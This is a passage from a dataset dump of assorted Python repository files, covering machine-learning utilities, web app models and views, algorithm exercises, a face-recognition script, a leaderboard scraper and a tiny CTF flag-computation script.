test_size=0.2, random_state=42)\n x_train_vec = self._get_vectors(x_train)\n x_test_vec = self._get_vectors(x_test)\n return x_train_vec, x_test_vec, y_train, y_test\n\n def _validate(self, x_test_vec, y_test):\n preds = self.model.predict_proba(x_test_vec)\n self.roc_auc_score = roc_auc_score(y_test, preds[:, 1])\n self.average_precision_score = average_precision_score(y_test, preds[:, 1])\n print('ROC-AUC: {:.4f}'.format(self.roc_auc_score))\n print('PR-AUC: {:.4f}'.format(self.average_precision_score))\n self.roc_c = roc_curve(y_test, preds[:, 1])\n self.prec_rec = precision_recall_curve(y_test, preds[:, 1])\n self.plot()\n\n def fit_model(self, model_type='logit'):\n self.model_type = model_type\n x_train_vec, x_test_vec, y_train, y_test = self._prepare_data()\n if model_type == 'logit':\n from sklearn.linear_model import LogisticRegression\n lr = LogisticRegression(penalty='l1')\n lr.fit(x_train_vec, y_train)\n self.model = lr\n self._validate(x_test_vec, y_test)\n\n def predict_proba(self, sample):\n return self.model.predict_proba(sample)\n\n def build_important_track(self):\n if self.model_type == 'logit':\n imp = self.model.coef_\n if self.emb_type == 'tf-idf':\n imp = self._embedder.inverse_transform(imp)[0]\n edges = []\n for i in imp:\n j = i.split()\n if len(j) == 2:\n edges.append(j)\n elif len(j) > 2:\n for k in range(1, len(j)):\n edges.append([j[k - 1], j[k]])\n elif len(j) == 1:\n edges.append([j[0], None])\n return pd.DataFrame(edges).drop_duplicates()\n\n def _get_tsne(self, sample):\n return TSNE().fit_transform(sample.todense())\n\n def plot_projections(self, sample=None, target=None, ids=None):\n if sample is None:\n self._plot_proj_sample(self.features, self.target, self.users)\n else:\n self._plot_proj_sample(sample, target, ids)\n\n def _plot_proj_sample(self, sample, target=None, ids=None):\n pre_vec = self._get_vectors(sample)\n vec = self._get_tsne(pre_vec)\n self._cached_tsne = vec\n self._tsne_sample = sample\n if ids is not None:\n self._tsne_users = ids\n\n if ids is not None:\n txt = np.array(['user_id: {}'.format(i) for i in ids])\n else:\n txt = None\n\n if target is not None:\n figs = []\n for i in np.unique(target):\n figs.append(\n go.Scatter(\n x=vec[target == i][:, 0],\n y=vec[target == i][:, 1],\n name=str(i),\n mode='markers',\n text=list(txt[target == i]) if txt is not None else txt,\n )\n )\n else:\n probs = self.predict_proba(pre_vec)[:, 1]\n if txt is not None:\n txt = [i + ',\\n prob: {}'.format(j) for i, j in zip(txt, probs)]\n else:\n txt = ['prob: {}'.format(i) for i in probs]\n\n figs = [go.Scatter(\n x=vec[:, 0],\n y=vec[:, 1],\n mode='markers',\n marker=dict(\n color=probs,\n colorscale='YlGnBu',\n showscale=True\n ),\n text=txt, )]\n\n py.init_notebook_mode()\n py.iplot(figs)\n filename = os.path.join(self.export_folder, 'tsne {}.html'.format(datetime.now()))\n py.plot(figs, filename=filename, auto_open=False)\n\n def _get_data_from_plot(self, bbox):\n bbox = np.array(bbox)\n left = bbox[:, 0].min()\n right = bbox[:, 0].max()\n up = bbox[:, 1].max()\n bot = bbox[:, 1].min()\n res = self._cached_tsne\n fil = (res[:, 1] < up) & (res[:, 1] > bot) & (res[:, 0] < right) & (res[:, 0] > left)\n users = self._tsne_users[fil]\n data = self._source_data[self._source_data.user_pseudo_id.isin(users)]\n return data\n\n def plot_cluster_track(self, bbox):\n data = self._get_data_from_plot(bbox)\n data_agg = get_all_agg(data, ['trans_count'])\n plot_graph_python(data_agg, 'trans_count', {'export_folder': self.export_folder})\n\n def _check_folder(self, settings):\n settings = check_folder(settings)\n self.export_folder = settings['export_folder']\n\n def plot(self):\n f, ax = plt.subplots(1, 2)\n f.set_size_inches(15, 5)\n ax[0].plot(self.roc_c[0], self.roc_c[1])\n ax[0].set_title('ROC curve')\n ax[1].plot(self.prec_rec[1], self.prec_rec[0])\n ax[1].set_title('Precision-Recall curve')\n plt.grid()\n filename = os.path.join(self.export_folder, 'scores {}.png'.format(datetime.now()))\n f.savefig(filename)\n","repo_name":"bagavievaskar/aita","sub_path":"retentioneering/analysis/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":8234,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"32748072069","text":"import hashlib\r\nres=hashlib.md5(b'zhishixuebao').hexdigest()\r\nprint(res)\r\nflag='flag{'\r\nfor i in range(0,len(res),2):\r\n flag+=res[i]\r\na = list('0'*15)\r\nfor i in range(15):\r\n value = 255 - 98 - i - ord(a[i])+2\r\n a[i] = chr(value)\r\nflag+=\"\".join(str(i) for i in a)+\"}\"\r\nprint(flag)","repo_name":"scnu-sloth/XSCTF-2022-Quals","sub_path":"Reverse-easyEZbaby_app/exp/exp.py","file_name":"exp.py","file_ext":"py","file_size_in_byte":288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"30310647166","text":"import matplotlib.pyplot as plt\nimport numpy as np\nfrom imblearn.over_sampling import SMOTE\nfrom imblearn.under_sampling import RandomUnderSampler\nfrom sklearn.metrics import accuracy_score, precision_score,\\\n recall_score, roc_auc_score, f1_score, classification_report,\\\n roc_curve, auc\nfrom sklearn.metrics import plot_confusion_matrix\nfrom sklearn.model_selection import learning_curve\n\n\ndef undersample(x, y):\n \"\"\"\n Undersampling by randomly selecting samples from majority class.\n\n :param x: dataframe with attributes for training (independent\n variables).\n :param y: dataframe with label attribute (dependent variable).\n :return: x and y after undersampling performed.\n \"\"\"\n rus = RandomUnderSampler(random_state=3)\n return rus.fit_resample(x, y)\n\n\ndef oversample(x, y):\n \"\"\"\n Perform oversampling using SMOTE method.\n\n :param x: dataframe with attributes for training (independent\n variables).\n :param y: dataframe with label attribute (dependent variable).\n :return: x and y after oversampling performed.\n \"\"\"\n smote = SMOTE(random_state=42)\n return smote.fit_resample(x, y)\n\n\ndef compare_models(models, names, x, y):\n \"\"\"\n Draw table with model and their performance.\n\n :param models: list of trained models.\n :param names: list of names of models.\n :param x: dataframe with data for prediction.\n :param y: dataframe with expected labels.\n \"\"\"\n max_len = np.max([len(x) for x in names])\n print(\" \".ljust(max_len) + \" Accuracy F1 (micro) F1 (macro)\"\n \" Precision Recall AUC ROC\")\n for i, model in enumerate(models):\n y_pred = model.predict(x)\n y_pred_prob = model.predict_proba(x)[:, 1]\n print(f\"{names[i]}\" + \"\".ljust(max_len-len(names[i])) + \" \"\n f\"| {accuracy_score(y, y_pred):.2f} \"\n f\"| {f1_score(y, y_pred, average='micro'):.2f} \"\n f\"| {f1_score(y, y_pred, average='macro'):.2f} \"\n f\"| {precision_score(y, y_pred):.2f} \"\n f\"| {recall_score(y, y_pred):.2f} \"\n f\"| {roc_auc_score(y, y_pred_prob):.2f} |\")\n\n\ndef evaluate_model(model, x, y):\n \"\"\"\n Print evaluation of model.\n\n :param model: model to be evaluated.\n :param x: dataframe with data for prediction.\n :param y: dataframe with expected labels.\n \"\"\"\n y_pred = model.predict(x)\n y_pred_prob = model.predict_proba(x)[:, 1]\n\n fig, axs = plt.subplots(nrows=1, ncols=2,\n figsize=(12, 4), constrained_layout=True)\n plot_confusion_matrix(\n model, x, y, cmap=plt.cm.Blues, normalize='true', ax=axs[0]\n )\n roc_auc(y_pred_prob, y, ax=axs[1])\n print(classification_report(y, y_pred))\n print(f'ROC AUC score: {round(roc_auc_score(y, y_pred_prob), 3)}')\n\n\ndef roc_auc(y_pred_prob, y_true, plot=True, label=\"curve\", ax=None):\n \"\"\"\n Draw ROC curve plot.\n\n :param y_pred_prob: probabilitie of predicted labels.\n :param y_true: true labels.\n :param plot: if True, ROC curve plot is drawn.\n :param label: label of a plot.\n :param ax: optional axis for plot.\n :return: ROC AUC score.\n \"\"\"\n fpr, tpr, _ = roc_curve(y_true, y_pred_prob)\n auc_value = auc(fpr, tpr)\n\n if plot:\n if not ax:\n fig, ax = plt.subplots()\n ax.scatter(x=fpr, y=tpr, color='navy')\n ax.plot(\n fpr, tpr,\n c=tuple(np.random.rand(3, 1)[:, 0]),\n lw=2,\n label=f'{label} (AUC = {round(auc_value, 3)})'\n )\n ax.plot([0, 1], [0, 1], color='navy', lw=2, linestyle='--')\n ax.set_xlim([0.0, 1.0])\n ax.set_ylim([0.0, 1.05])\n ax.set_xlabel('False Positive Rate')\n ax.set_ylabel('True Positive Rate')\n ax.set_title('ROC Curve')\n ax.legend(loc=\"lower right\")\n\n return auc_value\n\n\ndef plot_feature_importance(\n importance,\n feature_names,\n max_num=-1,\n reverse_order=False\n):\n \"\"\"\n Plot features sorted by importance.\n\n :param importance: importance of features.\n :param feature_names: names of features.\n :param max_num: maximal number of features to show.\n :param reverse_order: whether importances are in reverse order.\n :return: feature names sorted by importance.\n \"\"\"\n indexes = np.argsort(importance)\n names = []\n feature_importance = []\n\n if reverse_order:\n indexes = list(reversed(indexes))\n\n for i in indexes:\n names.append(feature_names[i])\n feature_importance.append(importance[i])\n\n plt.figure(figsize=(10, len(feature_names[:max_num]) // 2))\n plt.barh(names[-max_num::], feature_importance[-max_num::])\n plt.yticklabels = names\n\n return names[::-1]\n\n\ndef plot_learning_curve(\n estimator, title, X, y, cv=None, train_sizes=np.linspace(.1, 1.0, 10)\n):\n \"\"\"\n Plot learning curve of classifier.\n\n Function taken and edited from:\n https://scikit-learn.org/stable/auto_examples/model_selection/plot_learning_curve.html\n\n :param estimator: classifier of which learning curve will be drawn.\n :param title: title of learning curve plot.\n :param X: training data features.\n :param y: training data labels.\n :param cv: cross-validation (estimator or number of folds).\n :param train_sizes: train splits sizes.\n :return:\n \"\"\"\n plt.figure()\n plt.title(title)\n plt.ylim(0.45, 1.01)\n plt.xlabel('Number of samples', labelpad=20)\n plt.ylabel('Score', labelpad=20)\n train_sizes, train_scores, test_scores = learning_curve(\n estimator, X, y, cv=cv, n_jobs=-1, train_sizes=train_sizes)\n train_scores_mean = np.mean(train_scores, axis=1)\n train_scores_std = np.std(train_scores, axis=1)\n test_scores_mean = np.mean(test_scores, axis=1)\n test_scores_std = np.std(test_scores, axis=1)\n plt.grid()\n\n plt.fill_between(train_sizes, train_scores_mean - train_scores_std,\n train_scores_mean + train_scores_std, alpha=0.1,\n color=\"r\")\n plt.fill_between(train_sizes, test_scores_mean - test_scores_std,\n test_scores_mean + test_scores_std, alpha=0.1, color=\"g\")\n plt.plot(train_sizes, train_scores_mean, 'o-', color=\"r\",\n label='Train score')\n plt.plot(train_sizes, test_scores_mean, 'o-', color=\"g\",\n label='Cross-validation score')\n\n plt.legend(loc='best')\n return plt\n\n\nclass CombinedModel:\n \"\"\"\n CombinedModel class serve for combining several model to obtain one\n prediction. Model is selected by rule defined in `ruler`.\n\n :param models: list of models.\n :param ruler: function that return index of model to by used\n depending on rule from `ruler`.\n \"\"\"\n def __init__(self, models, ruler):\n super().__init__()\n self.models = models\n self.ruler = ruler\n\n def predict(self, x, probabilities=False):\n \"\"\"\n Make predictions depending on rules.\n\n :param x: test samples to be predicted.\n :param probabilities: return probabilities instead predictions.\n :return: list of predictions for all test samples.\n \"\"\"\n pred = np.zeros(x.shape[0])\n for i, model in enumerate(self.models):\n idxs = x[x.apply(self.ruler, axis=1) == i].index\n if probabilities:\n pred[idxs] = model.predict_proba(x.loc[idxs])[:, 1]\n else:\n pred[idxs] = model.predict(x.loc[idxs])\n return pred\n","repo_name":"pmacinec/diabetes-patients-readmissions-prediction","sub_path":"src/evaluation.py","file_name":"evaluation.py","file_ext":"py","file_size_in_byte":7523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"32021713051","text":"from rest_framework import serializers\n\nfrom general.models import Blog\n\n\nclass ListBlogSerializer(serializers.ModelSerializer):\n created_at = serializers.SerializerMethodField()\n\n class Meta:\n model = Blog\n fields = (\n 'id',\n 'title',\n 'sub_title',\n 'description',\n 'thumbnail',\n 'image',\n 'tags',\n 'author',\n 'slug',\n 'created_at'\n )\n\n \n def get_created_at(self, instance):\n if instance.created_at:\n instance_date = instance.created_at\n \n day_number = instance_date.day\n month_name = instance_date.strftime(\"%B\")\n year_number = instance_date.year\n\n date = f'{day_number} {month_name} {year_number}'\n\n return date\n else:\n return None\n \n\n\n \n ","repo_name":"devaccolades/english-cafe","sub_path":"api/v1/general/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"73255916350","text":"import numpy as np\n\ndef cosine_similarity(arr1, arr2, PRINT_NAME=False):\n if PRINT_NAME: print(\"cosine:\")\n numerator = 0\n arr1_vector_length_squared = 0\n arr2_vector_length_squared = 0\n for i, x in enumerate(arr1):\n numerator += x*arr2[i]\n arr1_vector_length_squared += pow(x,2)\n arr2_vector_length_squared += pow(arr2[i], 2)\n\n return round((numerator/(np.sqrt(arr1_vector_length_squared)*np.sqrt(arr2_vector_length_squared))),3)\n\n\ndef mean(arr):\n return sum(arr)/len(arr)\n\ndef print_pearson_similarity(arr1, arr2, array_id_1=1, array_id_2=2, PRINT_NAME=False):\n \"\"\"\n use -1 for unknown values, any number for known values\n \"\"\"\n if PRINT_NAME: print(\"pearson:\")\n arr1_ignored = [x for x in arr1 if x!=-1]\n arr2_ignored = [x for x in arr2 if x!=-1]\n\n m1 = mean(arr1_ignored)\n m2 = mean(arr2_ignored)\n\n print(f\"m{array_id_1}=sum({arr1_ignored})/{len(arr1_ignored)}={m1}\")\n print(f\"m{array_id_2}=sum({arr2_ignored})/{len(arr2_ignored)}={m2}\")\n\n r1 = [x-m1 if x!=-1 else 0 for x in arr1]\n r2 = [x-m2 if x!=-1 else 0 for x in arr2]\n\n r1_calculation = f\"r{array_id_1}={[f'{x}-{m1}' if x!=-1 else 0 for x in arr1]}\"\n r1_calculation_without_quotes = r1_calculation.replace(\"'\", \"\")\n print(r1_calculation_without_quotes)\n\n r2_calculation = f\"r{array_id_2}={[f'{x}-{m2}' if x!=-1 else 0 for x in arr2]}\"\n r2_calculation_without_quotes = r2_calculation.replace(\"'\", \"\")\n print(r2_calculation_without_quotes)\n\n print(f\"cos(r{array_id_1},r{array_id_2})={cosine_similarity(r1, r2)}\")\n\n\ndef print_jaccard_similarity(arr1, arr2, PRINT_NAME=False):\n \"\"\"\n use number <=0 for negative/unknown values, >0 for known/positive values\n \"\"\"\n if PRINT_NAME: print(\"jaccard:\")\n numerator = sum([1 if (x>0 and y>0) else 0 for x,y in zip(arr1,arr2)])\n denominator = sum([1 if (x>0 or y>0) else 0 for x,y in zip(arr1,arr2)])\n answer = round(numerator/denominator, 3)\n\n print(f\"({[1 if (x>0 and y>0) else 0 for x,y in zip(arr1,arr2)]})/({[1 if (x>0 or y>0) else 0 for x,y in zip(arr1,arr2)]})={numerator}/{denominator}={answer}\")\n\n\n\narr1 = [-1,0,0,0,1]\narr2 = [0,1,1,1,0]\n\nprint(cosine_similarity(arr1, arr2, True))\n\nprint(\"-----------------------------\")\n\narr1 = [1, 2, 2, 3, 3]\narr2 = [1, 0, 1, 2, 3]\n\narr_id_1 = 4\narr_id_2 = 5\n\nprint_pearson_similarity(arr1, arr2, arr_id_1, arr_id_2, True)\n\nprint(\"-----------------------------\")\n\n\ns0 = [0,0,0,1,0,1]\ns1 = [0,0,2,4,0,2]\ns2 = [2,2,0,4,2,0]\ns3 = [2,2,0,4,2,0]\ns4 = [2,2,0,3,0,0]\ns5 = [2,2,0,3,0,0]\n\n\nprint_jaccard_similarity(s0, s2, True)","repo_name":"trymgrande/ITHINGDA-MSIT","sub_path":"semester 8/exam-scripts/Big Data/similarity.py","file_name":"similarity.py","file_ext":"py","file_size_in_byte":2582,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"18613626019","text":"from typing import List\n\n\ndef largestRectangleArea(heights: List[int]) -> int:\n if max(heights) == min(heights):\n return max(heights) * len(heights)\n heights.append(0)\n s = []\n ans = [0] * len(heights)\n for i in range(len(heights)):\n for j in range(len(s) - 1, -1, -1):\n if heights[s[j]] > heights[i]:\n ans[j] = heights[s[j]] * (i - s[j])\n heights[s[j]] = heights[i]\n else:\n break\n s.append(i)\n return max(ans)\n\n\ndef largestRectangleArea2(heights: List[int]) -> int:\n if max(heights) == min(heights):\n return max(heights) * len(heights)\n\n heights = [0] + heights + [0]\n n = len(heights)\n res = [0] * n\n stack = [0]\n\n for i in range(1, n):\n while heights[i] < heights[stack[-1]]:\n pos = stack.pop()\n res[pos] = heights[pos] * (i - stack[-1] - 1)\n stack.append(i)\n\n return max(res)\n\n\nheights = [2,1,2]\nprint(largestRectangleArea2(heights))\n","repo_name":"Aitar/Practice","sub_path":"python/单调栈/柱状图中最大的矩形.py","file_name":"柱状图中最大的矩形.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"25726725771","text":"import numpy as np\n\n\n\nclass RNNBatchGenerator(object):\n \"\"\"\n Class to produce batch generator required by any derived class\n of AbstrctRNN\n \"\"\"\n def __init__(self):\n super(RNNBatchGenerator, self).__init__()\n\n def get_batches(self, rnn, arr_x, arr_y):\n \"\"\"\n Abstract method to return the generator.\n Must be implemented in a derived class\n \"\"\"\n raise NotImplementedError(\"must be implemented in a derived class\")\n\n\nclass OneDSlidingGenerator(RNNBatchGenerator):\n \"\"\"\n Class to produce a sliding batch generator for next item prevision.\n Returns batch of x and y where y is simply the one shifted values of x\n \"\"\"\n def __init__(self):\n super(OneDSlidingGenerator, self).__init__()\n\n def get_batches(self, rnn, arr_x, arr_y):\n '''\n Create a generator that returns batches of size\n batch_size x n_steps from arr_x.\n\n Arguments\n ---------\n rnn: instance of any derived class of AstractRNN.\n arr_x: 1-d Array you want to make batches from\n arr_y: not used\n '''\n # Get the number of characters per batch and number of batches we can make\n characters_per_batch = rnn.batch_size * rnn.n_steps\n n_batches = len(arr_x) // characters_per_batch\n\n # Keep only enough characters to make full batches\n arr_x = arr_x[0:(n_batches * characters_per_batch)]\n\n # Reshape into batch_size rows\n arr_x = arr_x.reshape(rnn.batch_size, len(arr_x) // rnn.batch_size)\n\n for n in range(0, arr_x.shape[1], rnn.n_steps):\n # The features\n x = arr_x[:, n:n+rnn.n_steps]\n # The targets, shifted by one\n y_temp = arr_x[:, n+1:n+rnn.n_steps+1]\n\n # For the very last batch, y will be one character short at the end of\n # the sequences which breaks things. To get around this, I'll make an\n # array of the appropriate size first, of all zeros, then add the targets.\n # This will introduce a small artifact in the last batch, but it won't matter.\n y = np.zeros(x.shape, dtype=x.dtype)\n y[:,:y_temp.shape[1]] = y_temp\n yield x, y\n\nclass ListOfArrayGenerator(RNNBatchGenerator):\n \"\"\"\n Class to produce a batch generator of arrays.\n \"\"\"\n\n def __init__(self):\n super(ListOfArrayGenerator, self).__init__()\n\n def get_batches(self, rnn, arr_x, arr_y):\n n_batches = len(arr_x) // rnn.batch_size\n arr_x = arr_x[0:(n_batches * len(arr_x))]\n arr_y = arr_y[0:(n_batches * len(arr_y))]\n\n for n in range(0, n_batches):\n yield (np.array(arr_x[n:n+rnn.batch_size]),\n np.array([arr_y[n:n+rnn.batch_size]]).T)\n\n\n\n\n","repo_name":"fpercerou/udacity","sub_path":"deep_learning_nanodegree/course_4_rnn/lesson_3_lstm_implementation/rnn_batch_generators.py","file_name":"rnn_batch_generators.py","file_ext":"py","file_size_in_byte":2763,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"11499730027","text":"import datetime\nfrom flask import request\nfrom config.apps import db\n\nclass Menu(db.Model):\n __tablename__ = 'menu'\n menu_id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(300), unique=True, nullable=False)\n description = db.Column(db.Text(), nullable=False)\n rating = db.Column(db.DECIMAL(asdecimal=False), default=0.0)\n img_url = db.Column(db.String(50), nullable=True)\n recipes = db.relationship('Recipe', backref='menu', lazy='dynamic')\n\n create_time = db.Column('created_at', db.DateTime, default=datetime.datetime.now)\n update_time = db.Column('last_updated', db.DateTime, default=datetime.datetime.now, onupdate=datetime.datetime.now)\n\n def __repr__(self):\n return ''.format(self.menu_id)\n\nclass RecipeIngredient(db.Model):\n __tablename__ = 'recipe_ingredient'\n recipe_id = db.Column('recipe_id', db.Integer, db.ForeignKey('recipe.recipe_id'), primary_key=True)\n ingredient_id = db.Column('ingredient_id', db.Integer, db.ForeignKey('ingredient.ingredient_id'), primary_key=True)\n quantity = db.Column('quantity', db.DECIMAL(asdecimal=False)),\n\n\nclass Recipe(db.Model):\n __tablename__ = 'recipe'\n recipe_id = db.Column(db.Integer, primary_key=True)\n menu_id = db.Column(db.Integer, db.ForeignKey('menu.menu_id'))\n name = db.Column(db.String(20))\n description = db.Column(db.Text())\n img_url = db.Column(db.String(255))\n instructions = db.relationship('Instruction', backref='recipe', lazy='dynamic')\n ingredients = db.relationship('Ingredient', secondary='recipe_ingredient', lazy='subquery', backref=db.backref('recipe', lazy=True))\n \n create_time = db.Column('created_at', db.DateTime, default=datetime.datetime.now)\n update_time = db.Column('last_updated', db.DateTime, default=datetime.datetime.now, onupdate=datetime.datetime.now)\n\n def __repr__(self):\n return ''.format(self.recipe_id)\n\nclass Ingredient(db.Model):\n __tablename__ = 'ingredient'\n ingredient_id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(20))\n description = db.Column(db.Text())\n img_url = db.Column(db.String(255))\n measure_number = db.Column(db.Integer)\n measure_type = db.Column(db.String(20))\n energy = db.Column(db.Integer)\n fat = db.Column(db.Integer)\n carbohydrate = db.Column(db.Integer)\n protien = db.Column(db.Integer)\n sodium = db.Column(db.Integer)\n recipes = db.relationship('Recipe', secondary='recipe_ingredient', lazy='subquery', backref=db.backref('ingredient', lazy=True))\n \n create_time = db.Column('created_at', db.DateTime, default=datetime.datetime.now)\n update_time = db.Column('last_updated', db.DateTime, default=datetime.datetime.now, onupdate=datetime.datetime.now)\n\n def __repr__(self):\n return ''.format(self.id)\n\nclass Instruction(db.Model):\n instruction_id = db.Column(db.Integer, primary_key=True)\n recipe_id = db.Column(db.Integer, db.ForeignKey('recipe.recipe_id'))\n description = db.Column(db.Text())\n step_number = db.Integer\n img_url = db.Column(db.String(255))\n\n create_time = db.Column('created_at', db.DateTime, default=datetime.datetime.now)\n update_time = db.Column('last_updated', db.DateTime, default=datetime.datetime.now, onupdate=datetime.datetime.now)","repo_name":"ash-rwt/hello-fresh","sub_path":"backend/models/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"32553063442","text":"from multiprocessing import Process, Manager, Value\nimport pickle\nimport math\nimport time\n\nimport cv2\nimport face_recognition\nimport dlib\nimport numpy as np\n\n\n# databaseの読み込み\ndatas = {}\nwith open('mini_data.pickle', mode='rb') as f:\n datas = pickle.load(f)\n\n\ndef get_distance(a, b):\n \"\"\"\n 画像間の類似度を測定する\n :param a: list\n :param b: list\n :return: float\n \"\"\"\n distance = 0\n for i in range(len(a)):\n distance += (a[i] - b[i]) ** 2\n return math.sqrt(distance)\n\n\ndef concat_tile(im_list_2d):\n \"\"\"\n イメージをタイル状に敷き詰める\n :param im_list_2d: list(2d)\n :return:\n \"\"\"\n return cv2.vconcat([cv2.hconcat(im_list_h) for im_list_h in im_list_2d])\n\n\ndef recommend_faces(similar_paths_manager, frame_manager):\n \"\"\"\n カメラ映像から取得した人物の類似顔を探し出す関数\n \"\"\"\n while True:\n print(frame_manager)\n if not frame_manager:\n continue\n frame = np.ndarray(frame_manager[:])\n # 顔認識\n detector = dlib.get_frontal_face_detector()\n\n # 顔データ(人数分)\n rects = detector(frame, 1)\n\n # 顔認識できなかったとき\n if not rects:\n print(\"cant recognize faces\")\n\n continue\n\n dsts = []\n for rect in rects:\n dst = frame[rect.top():rect.bottom(), rect.left():rect.right()]\n dsts.append(dst)\n\n # 距離測定(とりあえず一人だけ)\n # 顔情報のベクトル化 類似配列の生成\n try:\n target_image_encoded = face_recognition.face_encodings(dsts[0])[0]\n except IndexError:\n continue\n\n similar_vecs = []\n similar_paths = []\n similar_distances = []\n\n i = 0\n for k in datas:\n distance = get_distance(datas[k], list(target_image_encoded))\n # 最初\n if i == 0:\n similar_distances.append(distance)\n similar_paths.append(k)\n similar_vecs.append(datas[k])\n i += 1\n for j in range(len(similar_distances)):\n # 10個以上\n if len(similar_distances) >= 10:\n # より近い\n if similar_distances[j] > distance:\n similar_distances.insert(j, distance)\n similar_paths.insert(j, k)\n similar_vecs.insert(j, datas[k])\n del similar_distances[-1]\n del similar_paths[-1]\n del similar_vecs[-1]\n break\n # 10個以下\n else:\n if similar_distances[j] > distance:\n similar_distances.insert(j, distance)\n similar_paths.insert(j, k)\n similar_vecs.insert(j, datas[k])\n break\n if j == len(similar_distances) - 1:\n similar_distances.append(distance)\n similar_paths.append(k)\n similar_vecs.append(datas[k])\n\n # print(\"{0}:{1}\".format(k, distance))\n # print(\"number{} is end\".format(i))\n i += 1\n print(\"finish about one face\")\n similar_paths_manager = similar_paths\n\n\ndef take_video(frame_manager):\n \"\"\"\n 入力データを生成する関数\n \"\"\"\n cap = cv2.VideoCapture(0) # 引数はカメラのデバイス番号\n while True:\n ret, frame = cap.read()\n # to break the loop by pressing esc\n frame_manager = list(frame)\n cv2.imshow(\"extra\", frame)\n k = cv2.waitKey(1)\n\n if k == 27:\n print(\"released!\")\n break\n cap.release()\n cv2.destroyAllWindows()\n print(\"release camera!!!\")\n\n\nif __name__ == '__main__':\n with Manager() as manager:\n similar_paths_manager = manager.list()\n frame_manager = manager.list()\n\n # プロセスの生成\n video_process = Process(target=take_video, args=[frame_manager,], name=\"video\")\n recommend_process = Process(target=recommend_faces, args=[similar_paths_manager, frame_manager], name=\"recommend\")\n\n # プロセスの開始\n video_process.start()\n recommend_process.start()\n\n\n","repo_name":"onikazu/FaceMandara","sub_path":"trash/face_mandara_manager.py","file_name":"face_mandara_manager.py","file_ext":"py","file_size_in_byte":4406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"74907470590","text":"from bs4 import BeautifulSoup\nimport requests\nfrom rich.console import Console\nfrom rich.table import Table\nimport pandas as pd\n\nurlA = \"https://www.heywhale.com/v2/api/tasks/62353f220cfed900174d7ef1/leaderboard?template=true\"\nurlB = \"https://www.heywhale.com/v2/api/tasks/625f69d2697f5d0018062ef9/leaderboard?template=true\"\ntextA = requests.get(urlA).text\ntextB = requests.get(urlB).text\n\ndef get_score(text):\n soup = BeautifulSoup(text, \"html.parser\")\n scores = {}\n for team in soup.findAll(\"tr\", {\"data-team-id\": True}):\n team_name = team.findAll(\"td\", {\"class\": lambda x: x == \"team-cell\"})[0].text.strip()\n team_name = team_name.replace(\"的团队\", \"\")\n score = float(team.findAll(\"td\", {\"class\": lambda x: x == \"submit-score\"})[0].text.strip().split(\"\\n\")[0])\n scores[team_name] = score\n return scores\n\nA, B = get_score(textA), get_score(textB)\n\ndfA = pd.DataFrame({\"team_name\": A.keys(), \"score_A\": A.values()})\ndfA = dfA.sort_values(\"score_A\", ascending = False).reset_index(drop = True)\ndfA[\"rank_A\"] = dfA.index + 1\ndfB = pd.DataFrame({\"team_name\": B.keys(), \"score_B\": B.values()})\ndfB = dfB.sort_values(\"score_B\", ascending = False).reset_index(drop = True)\ndfB[\"rank_B\"] = dfB.index + 1\ndf = pd.merge(dfA, dfB, how = \"outer\")\ndf.rank_A = df.rank_A.fillna(df.rank_A.max() + 1).astype(int)\ndf.rank_B = df.rank_B.fillna(df.rank_B.max() + 1).astype(int)\ndf.score_A = df.score_A.fillna(0)\ndf.score_B = df.score_B.fillna(0)\ndf = df.sort_values([\"rank_B\", \"rank_A\"])\ndf[\"score_change\"] = df.score_B - df.score_A\ndf[\"rank_change\"] = [\"+\" + str(_) if _ > 0 else str(_) for _ in (df.rank_A - df.rank_B) * (df.score_B != 0)]\n\n\ntable = Table(row_styles = [\"dim\", \"\"])\ncolors = [\"red\", \"green\", \"blue\", \"green\", \"blue\", \"green\", \"blue\"]\nfor i, col in enumerate(df.columns):\n table.add_column(col, style = colors[i])\n\n\nfor _, row in df.iterrows():\n table.add_row(*[x if isinstance(x, str) else str(x) if isinstance(x, int) else f\"{x:.4f}\" for x in row])\n\n\nconsole = Console()\nconsole.print(table)\n","repo_name":"CarnoZhao/utils","sub_path":"Ranker.py","file_name":"Ranker.py","file_ext":"py","file_size_in_byte":2044,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"60"} +{"seq_id":"24620331454","text":"from django.shortcuts import render, redirect, reverse\nfrom pages.forms import SubscriberForm\n# Create your views here.\n\n\ndef view_cart(request):\n \"\"\"See contents of cart also renders the subcribe\n form in the context\"\"\"\n context = {\n 'newsletter_form': SubscriberForm()\n }\n return render(request, \"cart.html\", context)\n\n\ndef add_to_cart(request, id):\n \"\"\"Add a qty of product to the cart\"\"\"\n quantity = int(request.POST.get('quantity'))\n\n cart = request.session.get('cart', {})\n cart[id] = cart.get(id, 0) + quantity\n\n request.session['cart'] = cart\n return redirect(reverse('products'))\n\n\ndef adjust_cart(request, id):\n \"\"\"Adjust qty of items in cart\"\"\"\n quantity = int(request.POST.get('quantity'))\n cart = request.session.get('cart', {})\n\n if quantity > 0:\n cart[id] = quantity\n else:\n cart.pop(id)\n\n request.session['cart'] = cart\n return redirect(reverse('view_cart'))\n\n\ndef delete_cart_item(request, id):\n \"\"\"Delete of remove an item from the cart\"\"\"\n cart = request.session.get('cart', {})\n\n cart.pop(id)\n\n request.session['cart'] = cart\n return 